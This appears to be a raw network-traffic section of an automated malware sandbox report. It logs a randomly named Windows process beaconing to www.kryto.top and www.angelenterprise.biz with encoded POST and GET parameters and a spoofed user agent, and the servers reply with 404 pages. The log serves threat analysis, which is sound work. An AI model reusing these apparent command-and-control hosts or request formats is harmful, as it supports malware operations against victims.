                        Sep 9, 2024 04:52:41.191865921 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                        Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                        Sep 9, 2024 04:52:41.191879034 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                        Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                        Sep 9, 2024 04:52:41.191890001 CEST448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                        Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                        Sep 9, 2024 04:52:41.192078114 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                        Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                        Sep 9, 2024 04:52:41.192154884 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                        Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                        Sep 9, 2024 04:52:41.196687937 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                        Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.449757162.0.213.94802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:43.081810951 CEST10855OUTPOST /09dt/ HTTP/1.1
                        Host: www.kryto.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.kryto.top
                        Referer: http://www.kryto.top/09dt/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 45 42 6e 38 63 7a 42 37 67 38 30 55 6e 56 65 41 57 6c 64 45 59 50 30 73 35 66 7a 73 39 52 53 4f 53 33 4c 54 45 38 78 67 4e 48 47 35 63 64 32 5a 55 49 71 41 34 65 43 44 36 73 77 70 74 71 75 69 62 4a 2b 6f 5a 6d 77 46 4f 42 61 66 37 49 34 6d 53 53 57 36 61 73 49 43 76 75 6d 70 30 54 41 32 4c 6f 6b 54 7a 38 4a 6d 51 31 4d 44 37 30 62 69 30 45 75 58 50 61 66 4b 30 68 6c 43 5a 71 50 6e 4e 6f 49 6c 41 75 63 48 51 51 54 4f 76 56 4e 69 74 53 5a 64 7a 65 6c 51 4c 6e 53 6e 4c 38 36 6e 4f 30 52 77 79 62 7a 6f 56 31 4e 70 71 56 64 61 63 34 50 4f 69 47 51 42 71 4b 2f 4b 57 77 76 54 6f 6d 63 31 69 65 31 31 52 4c 52 6e 58 43 34 76 38 47 38 31 4e 30 31 63 52 38 41 4f 7a 54 78 64 70 72 59 47 4d 55 72 59 53 6e 2b 42 4c 70 6f 49 65 4e 75 35 34 47 44 4d 32 47 4b 71 6b 41 30 61 77 41 37 43 69 50 4a 33 36 64 31 49 6f 6e 31 78 62 50 48 41 74 6f 38 78 38 32 64 5a 58 34 45 6a 33 4c 56 33 4b [TRUNCATED]
                        Data Ascii: lt=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6yEBn8czB7g80UnVeAWldEYP0s5fzs9RSOS3LTE8xgNHG5cd2ZUIqA4eCD6swptquibJ+oZmwFOBaf7I4mSSW6asICvump0TA2LokTz8JmQ1MD70bi0EuXPafK0hlCZqPnNoIlAucHQQTOvVNitSZdzelQLnSnL86nO0RwybzoV1NpqVdac4POiGQBqK/KWwvTomc1ie11RLRnXC4v8G81N01cR8AOzTxdprYGMUrYSn+BLpoIeNu54GDM2GKqkA0awA7CiPJ36d1Ion1xbPHAto8x82dZX4Ej3LV3Kym+zvQfTrjrYobsHxnAsgxeksa3F0slo5Spd8ly224oVGIBfpxo2vpPe8z/Tuv6MLPGNDBOgwFmMiEGMaGJspr6sEBC64RAgschvNKiTOonAju2BtKk9HfiLHhyhPgi8BVkPC9ZeI2thLPyJTt/8WeOda2SmXroYw0pTBBKfUD6t3wKBW/msPDUghDCH4AjFTRQUw8VYn689GrDDH9fWZCF+jWYhd8xy+uHbIyzRZqx4QZnzgtcKmI7IKWaNuesQeVAkxZ5SRp3xbTd1G2dYmTq2MxV+thVyNimq1QZsLg0wiQaG3JEd3ruO6DSv9gNOeU8H9QgoNC8Bs4AgtIiZzKv6LJ+PTTtmQKANsEuATz4C6udGQI1vbhICEWkMspqPcybNOHch2Q9fgFoJjBHO1NdG65WodjHFnLC0OHV2ZYGNvce5MFrrOnPG7GO2SnPzfatUe0p9NvunRdfKSLlIcViyIAhqa6ylSQXl5CWTGE3RX+4CFMeUdQDS6v+wQQ8yJ60ivqIPOLJI0F2LzsuLA/NbnnvU5DXgdQCOedU9ydSmIuas3KwnnStwvyNugOaTFKY3meGVb2dmrj+9p4pDPAx66LJZFeXK7XajeTGmyPB0ePM0WbHSZFAOekJ1JTsZ5ged+SF0XBf9+V2Cm2uwt470RmY+uFPLA7 [TRUNCATED]
                        Sep 9, 2024 04:52:43.748126030 CEST1236INHTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:52:43 GMT
                        Server: Apache
                        Content-Length: 16052
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                        Sep 9, 2024 04:52:43.748162985 CEST224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                        Sep 9, 2024 04:52:43.748173952 CEST1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                        Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                        Sep 9, 2024 04:52:43.748189926 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                        Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                        Sep 9, 2024 04:52:43.748203039 CEST1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                        Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                        Sep 9, 2024 04:52:43.748214006 CEST672INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                        Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                        Sep 9, 2024 04:52:43.748231888 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                        Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                        Sep 9, 2024 04:52:43.748243093 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                        Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                        Sep 9, 2024 04:52:43.748255968 CEST448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                        Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                        Sep 9, 2024 04:52:43.748266935 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                        Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                        Sep 9, 2024 04:52:43.753390074 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                        Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.449758162.0.213.94802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:45.616488934 CEST490OUTGET /09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr HTTP/1.1
                        Host: www.kryto.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:46.258069038 CEST1236INHTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:52:46 GMT
                        Server: Apache
                        Content-Length: 16052
                        Connection: close
                        Content-Type: text/html; charset=utf-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                        Sep 9, 2024 04:52:46.258088112 CEST1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                        Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                        Sep 9, 2024 04:52:46.258097887 CEST1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                        Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                        Sep 9, 2024 04:52:46.258110046 CEST672INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                        Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                        Sep 9, 2024 04:52:46.258121014 CEST1236INData Raw: 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c
                        Data Ascii: 1676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="
                        Sep 9, 2024 04:52:46.258131027 CEST224INData Raw: 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d
                        Data Ascii: 11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stro
                        Sep 9, 2024 04:52:46.258142948 CEST1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                        Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                        Sep 9, 2024 04:52:46.258153915 CEST1236INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                        Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                        Sep 9, 2024 04:52:46.258169889 CEST448INData Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                        Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                        Sep 9, 2024 04:52:46.258229971 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                        Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                        Sep 9, 2024 04:52:46.262989044 CEST1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                        Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.4497593.33.130.190802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:51.419115067 CEST783OUTPOST /efkd/ HTTP/1.1
                        Host: www.angelenterprise.biz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.angelenterprise.biz
                        Referer: http://www.angelenterprise.biz/efkd/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
